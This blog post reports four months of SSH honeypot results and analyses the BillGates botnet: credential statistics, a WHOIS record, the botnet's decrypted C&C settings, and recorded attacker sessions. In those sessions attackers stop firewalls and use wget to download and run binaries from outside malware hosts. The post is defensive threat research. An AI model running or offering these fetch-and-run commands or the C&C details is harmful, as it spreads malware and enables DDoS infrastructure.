By

A few months ago I decided to install a honeypot to find some new threat and to collect some new malware to be analyzed. There are several honeypot I had in mind to try, but for now I have chosen Kippo.

From the Kippo’s homepage: “Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.” (To see all the features offered by this honeypot consult the Kippo’s homepage)

I will not dwell talking about the installation and the features which Kippo offers because this post is intended to be a final report with statistics and graphs only after months in operation. Regarding configuration tip&tricks that I have used, here there are some links that will be very helpful in setting up a similar setup:

My honeypot is a sort of ‘fork’ of original Kippo from desaster Github repo, in which I have merged some changes to hide or improve Kippo itself. That is: improvements like sftp, direct-tcp, exec stdin logging, ssh algorithm update, json logging, etc from Michel Oosterhof Kippo fork, all extra commands from kippo-extra github repo, and some minor changes. Then I applied a few workarounds/patches to hide my Kippo honeypot from each identification attempt.

The honeypot is located in Singapore and it was turned on 1st September 2014 and stopped 31 December 2014, so I have collected 4 months of data, during which, except for some occasional visit from someone who was playing with nmap, I received substantially attacks from a very specific botnet on which I will spend a few words at the end of the post.

Data, like connections, downloads, command inputs, etc, are saved in a database and thanks to the Kippo-Graph script from Bruteforce lab, can be viewed very comfortably via browser.

Now let’s get into the statistics.

Honeypot activity

Success ratio

Total login attempts is 112467 but how many of these have been successful?

Just under 4% success login. But why? Let’s see Username and Passwors used to login into SSH.

Top 10 usernames – User



Top 10 passwords – Password



Top 10 User-Pass combos – Combo



OK, strange User/Password combinations have been used, probably that’s the result of a dictionary based script used by the botnet. Clearly the most common attempt, 46% of the total, has been done using root/admin. In fact 3644 is very close to the number of successful logins.

Now let’s see what is the SSH Client used to try to login on the honeypot.

Top 10 SSH clients

Putty stands out pretty well.

Let’s now analyze the human activity performed on the honeypot.

Top 10 commands

Not many sessions have been interactively used by an operator (maybe they found out they were playing on a honeypot?), just 39 sessions have been recorded.

Let’s now try to understand the origin of these connections.

Connections per IP – IP



The traffic comes entirely from China! So we can make an educated guess on the origin of the botnet.

Below is the IP information:





inetnum: 103.41.124.0 - 103.41.127.255

netname: HEETHAILIMITED-HK

descr: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG

country: HK

admin-c: HA259-AP

tech-c: HA259-AP

status: ALLOCATED PORTABLE

mnt-by: APNIC-HM

mnt-lower: MAINT-HEETHAILIMITED-HK

mnt-routes: MAINT-HEETHAILIMITED-HK

mnt-irt: IRT-HEETHAILIMITED-HK

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks: This object can only be updated by APNIC hostmasters.

remarks: To update this object, please contact APNIC

remarks: hostmasters and include your organisation's account

remarks: name in the subject line.

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed: [email protected] 20141021

source: APNIC

irt: IRT-HEETHAILIMITED-HK

address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077

e-mail: [email protected]

abuse-mailbox: [email protected]

admin-c: HA259-AP

tech-c: HA259-AP

auth: # Filtered

mnt-by: MAINT-HEETHAILIMITED-HK

changed: [email protected] 20141020

source: APNIC

role: HEETHAILIMITED administrator

address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077

country: HK

phone: +855-78-585-191

fax-no: +855-78-585-191

e-mail: [email protected]

admin-c: HA259-AP

tech-c: HA259-AP

nic-hdl: HA259-AP

mnt-by: MAINT-HEETHAILIMITED-HK

changed: [email protected] 20141020

source: APNIC



The Whois service tells us that IP is located in Honk Kong, but digging deeper some more interesting information can be gathered, like this one:

103.41.124.46: SCAN SSH BruteForce Tool with fake PUTTY version

103.41.124.46: SSH Brute Force

Interesting right? Yes, those are SSH bruteforcing server.

This is a typical session, with a human operator on the keyboard, recorded from the honeypot.

First example:

my3:~# /etc/init.d/iptables stop

bash: /etc/init.d/iptables: command not found

my3:~# service iptables stop

bash: service: command not found

my3:~# SuSEfirewall2 stop

bash: SuSEfirewall2: command not found

my3:~# reSuSEfirewall2 stop

bash: reSuSEfirewall2: command not found

my3:~# cd /tmp/

my3:/tmp# wget -c http://42.96.191.5:300/arm

--2014-10-12 11:42:18-- http://42.96.191.5:300/arm

Connecting to 42.96.191.5:300... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1001465 (977K) [application/octet-stream]

Saving to: `arm



0% [> ] 4,356 1K/s eta 11m 9s

chmod 0755 /tmp/arm

1% [> ] 10,148 1K/s eta 8m 20s

./arm &

2% [> ] 24,628 2K/s eta 5m 34s

wget -c http://42.96.191.5:300/mips

3% [=> ] 35,028 2K/s eta 7m 12s

chmod 0755 /tmp/mips

./mips &

wget -c http://42.96.191.5:300/wrt

7% [==> ] 72,988 2K/s eta 5m 33s

chmod 0755 /tmp/wrt

./wrt &

16% [======> ] 168,844 4K/s eta 3m 8s

*** End of log! ***

Second example:



my3:~# uname -a

Linux my3 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux

my3:~# wget http://121.40.141.102:8081/Syn1

--2014-09-23 06:06:43-- http://121.40.141.102:8081/Syn1

Connecting to 121.40.141.102:8081... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1524643 (1M) [application/octet-stream]

Saving to: `Syn1



100%[======================================>] 1,524,643 125K/s



2014-09-23 06:06:55 (125 KB/s) - `Syn1' saved [1524643/1524643]

my3:~# chmod 777 Syn1

my3:~# ./Syn1

bash: ./Syn1: command not found

my3:~#

*** End of log! ***

– From SSH BruteForce script (botnet):



bash: /etc/init.d/iptables: command not found

rm: cannot remove `/var/spool/cron/crontabs': No such file or directory

rm: cannot remove `/var/spool/cron/crontabs': No such file or directory

--2014-09-20 06:45:51-- http://www.frade8c.com:9162/root

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 187350 (182K) [application/octet-stream]

Saving to: `root



100%[======================================>] 187,350 66K/s



2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]

--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 187350 (182K) [application/octet-stream]

Saving to: `root



25% [=========> ] 47,538 12K/s eta 11s



Length: 187350 (182K) [application/octet-stream]

Saving to: `root



100%[======================================>] 187,350 66K/s



2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]

--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 187350 (182K) [application/octet-stream]

Saving to: `root



100%[======================================>] 187,350 17K/s



2014-09-20 06:46:03 (17 KB/s) - `root' saved [187350/187350]

--2014-09-20 06:46:03-- http://www.frade8c.com:9162/jdhe

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1554782 (1M) [application/octet-stream]

Saving to: `jdhe



20% [=======> ] 313,968 71K/s eta 17s

[...]

*** End of log! ***

Botnet Info

The large amount of data recorded from the honeypot refer to a very specific botnet: the BillGates botnet. I came to this conclusion after analyzing the IP and samples captured by Kippo and after doing some research with Google. Here you can download the latest fresh samples captured by Kippo (30 December). (password: infected)



I uploaded just one copy of each file since there were a lot of duplicates. See below:

I preferred not to publish any file analysis because there is enough information online, particularly on Kernelmode Forum there are very interesting information and links, the same informations that I’ve found by analyzing the various modules. The only thing that varies is the C&C IP address obviously (dead at moment) and some minor code changes. In any case some modules were packed with UPX, so I’ve already unpacked them. These modules are the botnet’s modules (originally named atddd and cupsdd(h), names usually differ from the version to version).



Below some info gathered from botnet main module cupsdd(h):

The string decrypted with RSA algorithm is:

v9.jack52088.com:5168:1:1: :1:698412:697896:697380

in which, after split operation, have been assigned to these parameters:

g_strConnTgts = v9.jack52088.com (61.174.48.17) - C&C IP address

g_iGatsPort = 5168 - C&C server's port

g_iGatsIsFx =1

g_iIsService =1

g_strForceNote =

g_bDoBackdoor =1

g_strCryptStart = 698412

g_strDStart = 697896

g_strNStart = 697380



Here C&C Server information: Link

Attack vectors:



11CAttackBase

13CPacketAttack

10CAttackUdp

10CAttackSyn

11CAttackIcmp

10CAttackDns

10CAttackAmp

10CAttackPrx

15CAttackCompress

10CTcpAttack

9CAttackCc

9CAttackIe



User-agent used:

Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17

Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0

Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|

IP Hardcoded for DNS Amplification Attack —> Here (too long)

Source Codes of the project:

crtstuff.c

AmpResource.cpp

Attack.cpp

CmdMsg.cpp

ConfigDoing.cpp

DNSCache.cpp

ExChange.cpp

Global.cpp

Main.cpp

Manager.cpp

MiniHttpHelper.cpp

ProtocolUtil.cpp

ProvinceDns.cpp

StatBase.cpp

SysTool.cpp

ThreadAtk.cpp

ThreadClientStatus.cpp

ThreadConnection.cpp

ThreadFakeDetect.cpp

ThreadHttpGet.cpp

ThreadLoopCmd.cpp

ThreadMonGates.cpp

ThreadRecycle.cpp

ThreadShell.cpp

ThreadShellRecycle.cpp

ThreadTask.cpp

ThreadUpdate.cpp

UserAgent.cpp

AutoLock.cpp

BigInt.cpp

FileOp.cpp

Log.cpp

Media.cpp

NetBase.cpp

RSA.cpp

ThreadCondition.cpp

Thread.cpp

ThreadMutex.cpp

Utility.cpp

WinDefSVC.cpp

To track this botnet you can use BillGates Botnet Tracker developed by the discoverer of the botnet itself.

So this is all, after 4 months of Kippo honeypotting. I will continue to collect data and configure new honeypots and I will come back with updated findings.

Antelox